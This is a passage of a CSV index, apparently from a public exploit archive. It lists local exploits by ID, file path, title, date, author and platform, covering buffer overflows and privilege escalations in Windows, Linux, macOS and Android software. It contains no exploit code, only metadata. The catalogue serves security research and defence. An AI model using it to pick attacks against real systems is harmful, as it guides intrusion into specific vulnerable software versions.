(MS15-076)",2015-08-13,monoxgas,windows,local, -37771,exploits/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - Local Overflow (SEH)",2015-08-15,St0rn,windows,local, -37772,exploits/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy",2015-08-15,"Tantaryu MING",multiple,local, -37780,exploits/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local, -37799,exploits/windows/local/37799.py,"MASM321 11 Quick Editor '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)",2015-08-17,St0rn,windows,local, -37813,exploits/windows/local/37813.rb,"VideoCharge Studio - Local Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local, -37937,exploits/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local, -37890,exploits/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Local Buffer Overflow",2015-08-20,metacom,windows,local, -37898,exploits/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,linux,local, -37925,exploits/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Privilege Escalation",2015-08-21,"Google Security Research",windows,local, -37964,exploits/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Privilege Escalation",2012-10-18,"Nikita Tarakanov",windows,local, -37975,exploits/linux/local/37975.py,"ZSNES 1.51 - Local Buffer Overflow",2015-08-26,"Juan Sacco",linux,local, -37987,exploits/linux/local/37987.py,"FENIX 0.92 - Local Buffer Overflow",2015-08-27,"Juan Sacco",linux,local, -37988,exploits/linux/local/37988.py,"BSIGN 0.4.5 - Local Buffer Overflow",2015-08-27,"Juan Sacco",linux,local, -38035,exploits/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow",2015-08-31,"Robbie Corley",windows,local, -38036,exploits/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Local Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local, -38087,exploits/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Local Buffer Overflow",2015-09-06,"Robbie Corley",windows,local, -38089,exploits/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local, -38136,exploits/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local, -38137,exploits/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local, -38095,exploits/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",windows,local, -38138,exploits/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local, -38147,exploits/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Local Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local, -40975,exploits/android/local/40975.rb,"Google Android - get_user/put_user (Metasploit)",2016-12-29,Metasploit,android,local, -38185,exploits/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,windows,local, -38198,exploits/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local, -38199,exploits/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local, -38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local, -38201,exploits/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local, -38202,exploits/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local, -38218,exploits/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local (SEH)",2015-09-17,cor3sm4sh3r,windows,local, -38219,exploits/windows/local/38219.py,"ZTE PC UI USB Modem Software - Local Buffer Overflow",2015-09-17,R-73eN,windows,local, -38220,exploits/windows/local/38220.py,"IKEView R60 - Local Buffer Overflow (SEH)",2015-09-17,VIKRAMADITYA,windows,local, -38222,exploits/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)",2015-09-17,Metasploit,win_x86-64,local, -38232,exploits/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility - Local Buffer Overflow",2013-01-21,anonymous,linux,local, -38243,exploits/windows/local/38243.py,"Total Commander 8.52 (Windows 10) - Local Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local, -38244,exploits/windows/local/38244.py,"Total Commander 8.52 - Local Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local, -38287,exploits/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local, -38289,exploits/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Local Privilege Escalation",2015-09-22,"Google Security Research",windows,local, -38298,exploits/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local, -38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local, -38303,exploits/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Local Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",osx,local, -38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",multiple,local, -38319,exploits/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local, -38347,exploits/bsd/local/38347.rb,"Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)",2015-09-28,Metasploit,bsd,local,443 -38349,exploits/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow",2015-09-29,cor3sm4sh3r,windows,local, -38353,exploits/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation",2015-09-29,halfdog,linux,local, -38357,exploits/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,linux,local, -38360,exploits/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,osx,local, -38362,exploits/windows/local/38362.py,"MakeSFX.exe 1.44 - Local Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local, -38371,exploits/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation",2015-10-01,rebel,osx,local, -38381,exploits/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,windows,local, -38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,windows,local, -38390,exploits/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",linux,local, -38403,exploits/win_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win_x86,local, -38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",windows,local, -38456,exploits/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2015-10-14,ArminCyber,windows,local, -38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local, -38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local, -38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,windows,local, -38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,linux,local, -38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local, -38486,exploits/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local, -38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,windows,local, -38532,exploits/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local, -38533,exploits/windows/local/38533.c,"Microsoft Windows 10 - 'pcap' Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local, -38540,exploits/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local, -38559,exploits/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",linux,local, -38576,exploits/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local, -38600,exploits/windows/local/38600.py,"Sam Spade 1.14 - Crawl Website Buffer Overflow",2015-11-02,MandawCoder,windows,local, -38601,exploits/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local, -38603,exploits/windows/local/38603.py,"TCPing 2.1.0 - Local Buffer Overflow",2015-11-02,hyp3rlinx,windows,local, -38609,exploits/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Overflow",2015-11-03,"Vivek Mahajan",windows,local, -38631,exploits/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local, -38668,exploits/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local, -38672,exploits/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local, -38700,exploits/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local, -38704,exploits/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,local, -38751,exploits/windows/local/38751.txt,"IBM i Access 7.1 - Local Buffer Overflow / Code Execution",2015-11-18,hyp3rlinx,windows,local, -38752,exploits/windows/local/38752.c,"Watchguard Server Center - Local Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local, -38775,exploits/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local, -38792,exploits/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local, -38817,exploits/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local, -38832,exploits/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation",2015-12-01,rebel,linux,local, -38835,exploits/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local, -38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local, -38871,exploits/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local, -38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local, -38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local, -38937,exploits/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local, -39010,exploits/linux/local/39010.c,"QEMU (Gentoo) - Local Privilege Escalation",2015-12-17,zx2c4,linux,local, -39035,exploits/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local, -39061,exploits/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local, -39102,exploits/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local, -39112,exploits/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,linux,local, -39120,exploits/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local, -39121,exploits/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",windows,local, -39122,exploits/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local, -39132,exploits/windows/local/39132.py,"FTPShell Client 5.24 - Local Buffer Overflow",2015-12-30,hyp3rlinx,windows,local, -39134,exploits/linux/local/39134.txt,"DeleGate 9.9.13 - Local Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local, -39147,exploits/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local, -39159,exploits/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local, -39166,exploits/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)",2016-01-05,rebel,linux,local, -39207,exploits/linux/local/39207.txt,"dpkg Source Package - Index: pseudo-header Processing Multiple Local Directory Traversals",2014-05-25,"Raphael Geissert",linux,local, -39214,exploits/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local, -39217,exploits/linux/local/39217.c,"Amanda 3.3.1 - Local Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local, -39230,exploits/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local, -39244,exploits/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local, -39260,exploits/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local, -39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local, -40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local, -39284,exploits/windows/local/39284.txt,"Oracle - 'HtmlConverter.exe' Local Buffer Overflow",2016-01-21,hyp3rlinx,windows,local, -39285,exploits/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local, -40337,exploits/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local, -39310,exploits/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (2)",2016-01-25,"Google Security Research",windows,local, -39311,exploits/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (MS16-008) (1)",2016-01-25,"Google Security Research",windows,local, -40360,exploits/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 -40774,exploits/linux/local/40774.sh,"Nagios 4.2.2 - Local Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local, -39340,exploits/android/local/39340.cpp,"Google Android - 'sensord' Local Privilege Escalation",2016-01-27,s0m3b0dy,android,local, -39417,exploits/windows/local/39417.py,"FTPShell Client 5.24 - Create NewFolder Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local, -39432,exploits/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local, -39433,exploits/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2016-02-10,"King's Way",linux,local, -39438,exploits/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local, -39442,exploits/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local, -39443,exploits/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Local Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local, -39446,exploits/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local, -39480,exploits/windows/local/39480.py,"Core FTP Server 1.2 - Local Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local, -39508,exploits/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local, -39510,exploits/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local, -39520,exploits/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local, -39523,exploits/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local, -39525,exploits/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local, -39531,exploits/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local, -39535,exploits/linux/local/39535.sh,"Exim 4.84-3 - Local Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local, -39549,exploits/linux/local/39549.txt,"Exim < 4.86.2 - Local Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local, -39574,exploits/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local, -39579,exploits/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode (SEH)",2016-03-21,"Rakan Alotaibi",windows,local, -39594,exploits/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Local Stack Overflow",2016-03-22,"Charley Celice",windows,local, -39595,exploits/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local, -39628,exploits/linux/local/39628.txt,"FireEye - Malware Input Processor Privilege Escalation",2016-03-28,"Google Security Research",linux,local, -39630,exploits/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Local Privilege Escalation",2016-03-28,mr_me,windows,local, -39656,exploits/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local, -39666,exploits/windows/local/39666.txt,"Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local, -39670,exploits/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Local Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local, -39671,exploits/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Local Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local, -39673,exploits/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local, -39674,exploits/windows/local/39674.py,"Express Zip 2.40 - Directory Traversal",2016-04-08,R-73eN,windows,local, -39675,exploits/osx/local/39675.c,"Apple Intel HD 3000 Graphics Driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local, -39680,exploits/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,windows,local, -39692,exploits/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local, -39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local, -39702,exploits/linux/local/39702.rb,"Exim - 'perl_startup' Local Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local, -39967,exploits/linux/local/39967.txt,"SolarWinds Virtualization Manager - Local Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local, -39719,exploits/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local, -39727,exploits/windows/local/39727.txt,"CompuSource Systems Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local, -39734,exploits/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local, -39741,exploits/osx/local/39741.txt,"Mach Race OSX - Local Privilege Escalation",2016-04-27,fG!,osx,local, -39757,exploits/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,android,local, -39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local, -39769,exploits/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local, -39771,exploits/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local, -39772,exploits/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local, -39786,exploits/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Local Privilege Escalation",2016-05-09,LiquidWorm,windows,local, -39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local, -39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local, -39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local, -39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local, -39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local, -39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local, -39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local, -39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local, -39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local, -39843,exploits/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local, -42551,exploits/windows/local/42551.py,"MP3 WAV to CD Burner 1.4.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",windows,local, -39845,exploits/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local, -39888,exploits/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local, -39902,exploits/windows/local/39902.txt,"League of Legends Screensaver - Unquoted Service Path Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local, -39903,exploits/windows/local/39903.txt,"League of Legends Screensaver - Insecure File Permissions Privilege Escalation",2016-06-07,"Vincent Yiu",windows,local, -39908,exploits/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local, -39916,exploits/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local, -39933,exploits/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local, -39938,exploits/linux/local/39938.rb,"iSQL 1.0 - Command Injection",2016-06-13,HaHwul,linux,local, -39954,exploits/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local, -40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local, -39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,windows,local, -39984,exploits/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local, -39992,exploits/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local, -40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",windows,local, -40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,windows,local, -40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local, -40023,exploits/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local, -40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local, -40039,exploits/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local, -40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local, -40043,exploits/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local, -40049,exploits/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,lin_x86-64,local, -40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",android,local, -40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local, -40071,exploits/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Local Privilege Escalation",2016-07-08,sh4d0wman,windows,local, -40072,exploits/windows/local/40072.txt,"InstantHMI 6.1 - Local Privilege Escalation",2016-07-08,sh4d0wman,windows,local, -40107,exploits/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local, 